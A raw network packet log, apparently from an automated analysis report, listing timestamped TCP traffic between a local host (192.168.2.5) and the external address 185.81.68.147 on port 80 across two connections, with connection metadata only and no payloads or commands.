Dec 13, 2024 01:37:15.313126087 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:15.313266039 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:15.313914061 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:15.314033985 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:15.314099073 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:15.314806938 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:15.314918041 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:15.314970016 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:15.315718889 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:15.315861940 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:15.315911055 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:15.316698074 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:15.316801071 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:15.316864967 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:15.317545891 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:15.317668915 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:15.317719936 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:15.318439007 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:15.318566084 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:15.318613052 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:15.319377899 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:15.319456100 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:15.319503069 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:15.320250034 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:15.320373058 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:15.320430040 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:15.321186066 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:15.321301937 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:15.321365118 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:15.322065115 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:15.322194099 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:15.322269917 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:15.322977066 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:15.323090076 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:15.323137045 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:15.323906898 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:15.324022055 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:15.324070930 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:15.324795008 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:15.324912071 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:15.324959993 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:15.325717926 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:15.325834990 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:15.325886965 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:15.326621056 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:15.326742887 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:15.326795101 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:15.327532053 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:15.327697039 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:15.327872038 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:15.328435898 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:15.328542948 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:15.328588963 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:15.329360962 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:15.329480886 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:15.329530001 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:15.330257893 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:15.330404043 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:15.330502033 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:15.331178904 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:15.331341982 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:15.331389904 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:15.332083941 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:15.332195044 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:15.332243919 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:15.332997084 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:15.333092928 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:15.333412886 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:15.333904982 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:15.334017038 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:15.334062099 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:15.334809065 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:15.334928989 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:15.334980965 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:15.335757017 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:15.335822105 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:15.335872889 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:15.336611986 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:15.336757898 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:15.336828947 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:15.337532997 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:15.337709904 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:15.337759018 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:15.338440895 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:15.338593006 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:15.338653088 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:15.339330912 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:15.379663944 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:15.483530045 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:15.483591080 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:15.483928919 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:15.483983040 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:15.483992100 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:15.484035015 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:15.484848022 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:15.484903097 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:15.484961033 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:15.485780954 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:15.485904932 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:15.486120939 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:15.486653090 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:15.486771107 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:15.486829042 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:15.487549067 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:15.487603903 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:15.487658024 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:15.488488913 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:15.488626003 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:15.488677979 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:15.489407063 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:15.489500046 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:15.489552975 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:15.490294933 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:15.490416050 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:15.490469933 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:15.491220951 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:15.491354942 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:15.491411924 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:15.492113113 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:15.492213011 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:15.492749929 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:15.493006945 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:15.493159056 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:15.493271112 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:15.493923903 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:15.494055033 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:15.494107962 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:15.494829893 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:15.494952917 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:15.495177984 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:15.495743036 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:15.495845079 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:15.495907068 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:15.496659994 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:15.496773958 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:15.496870041 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:15.497565031 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:15.497683048 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:15.497729063 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:15.498481035 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:15.498591900 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:15.498644114 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:15.499398947 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:15.499492884 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:15.499629021 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:15.500307083 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:15.500413895 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:15.500737906 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:15.501264095 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:15.501359940 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:15.502125978 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:15.502218008 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:15.502223015 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:15.502268076 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:15.503051043 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:15.503156900 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:15.503942013 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:15.503993988 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:15.504077911 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:15.504148006 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:15.504844904 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:15.504898071 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:15.505026102 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:15.505779028 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:15.505877972 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:15.505927086 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:15.506675005 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:15.506731033 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:15.506875992 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:15.507580996 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:15.507700920 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:15.507761002 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:15.508503914 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:15.508610964 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:15.508742094 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:15.509407043 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:15.509526014 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:15.509926081 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:15.510308981 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:15.510395050 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:15.511207104 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:15.511260986 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:15.511348009 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:15.511395931 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:15.512121916 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:15.512295008 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:15.512739897 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:15.513072014 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:15.513123989 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:15.513953924 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:15.514008045 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:15.514062881 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:15.514110088 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:15.514844894 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:15.514972925 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:15.515074015 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:15.515767097 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:15.515875101 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:15.516069889 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:15.516694069 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:15.516786098 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:15.517071962 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:15.517585993 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:15.517704964 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:15.517842054 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:15.518493891 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:15.518625975 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:15.518675089 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:15.519412994 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:15.519531965 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:15.519654036 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:15.520320892 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:15.520433903 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:15.520484924 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:15.521246910 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:15.521383047 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:15.521466017 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:15.522140026 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:15.522296906 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:15.522629976 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:15.523029089 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:15.523169994 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:15.523219109 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:15.523962021 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:15.524101019 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:15.524153948 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:15.524849892 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:15.524974108 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:15.525032997 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:15.525772095 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:15.525895119 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:15.525954962 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:15.526683092 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:15.526803017 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:15.527265072 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:15.527589083 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:15.527698040 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:15.527748108 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:15.528495073 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:15.528629065 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:15.528742075 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:15.529419899 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:15.529540062 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:15.530327082 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:15.530379057 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:15.530441046 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:15.530494928 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:15.531172991 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:15.582822084 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:15.675430059 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:15.675493956 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:15.675548077 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:15.675853968 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:15.675951958 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:15.676033974 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:15.676736116 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:15.676871061 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:15.676933050 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:15.677648067 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:15.677737951 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:15.677835941 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:15.678550959 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:15.678677082 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:15.678726912 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:15.679399967 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:15.679471016 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:15.679502010 CET	49707	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:15.799216986 CET	80	49707	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:16.328490019 CET	49711	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:16.448249102 CET	80	49711	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:16.448749065 CET	49711	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:16.448924065 CET	49711	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:16.568573952 CET	80	49711	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:17.775022984 CET	80	49711	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:17.775044918 CET	80	49711	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:17.775120020 CET	49711	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:17.775245905 CET	80	49711	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:17.775290966 CET	80	49711	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:17.775302887 CET	80	49711	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:17.775346994 CET	49711	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:17.775430918 CET	80	49711	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:17.775441885 CET	80	49711	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:17.775464058 CET	80	49711	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:17.775480986 CET	80	49711	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:17.775492907 CET	80	49711	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:17.775496960 CET	49711	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:17.775496960 CET	49711	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:17.775526047 CET	49711	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:17.894916058 CET	80	49711	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:17.895054102 CET	80	49711	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:17.895220995 CET	49711	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:17.899143934 CET	80	49711	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:17.899230957 CET	80	49711	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:17.899687052 CET	49711	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:17.967524052 CET	80	49711	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:17.967637062 CET	80	49711	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:17.968920946 CET	49711	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:17.971658945 CET	80	49711	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:17.971801043 CET	80	49711	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:17.972042084 CET	49711	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:17.980094910 CET	80	49711	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:17.980209112 CET	80	49711	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:17.980470896 CET	49711	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:17.988550901 CET	80	49711	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:17.988637924 CET	80	49711	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:17.989154100 CET	49711	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:17.996968031 CET	80	49711	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:17.997153044 CET	80	49711	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:17.997277975 CET	49711	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:18.005357027 CET	80	49711	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:18.005461931 CET	80	49711	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:18.005789042 CET	49711	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:18.013829947 CET	80	49711	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:18.013921022 CET	80	49711	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:18.015296936 CET	49711	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:18.022284985 CET	80	49711	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:18.022321939 CET	80	49711	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:18.022877932 CET	49711	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:18.030610085 CET	80	49711	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:18.030756950 CET	80	49711	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:18.032048941 CET	49711	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:18.039019108 CET	80	49711	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:18.039138079 CET	80	49711	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:18.039222002 CET	49711	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:18.046336889 CET	80	49711	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:18.046444893 CET	80	49711	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:18.046531916 CET	49711	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:18.053622007 CET	80	49711	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:18.053714991 CET	80	49711	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:18.054521084 CET	49711	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:18.159725904 CET	80	49711	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:18.159847021 CET	80	49711	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:18.160280943 CET	49711	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:18.162106037 CET	80	49711	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:18.162236929 CET	80	49711	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:18.162442923 CET	49711	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:18.166894913 CET	80	49711	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:18.167026043 CET	80	49711	185.81.68.147	192.168.2.5
Dec 13, 2024 01:37:18.167275906 CET	49711	80	192.168.2.5	185.81.68.147
Dec 13, 2024 01:37:18.171709061 CET	80	49711	185.81.68.147	192.168.2.5
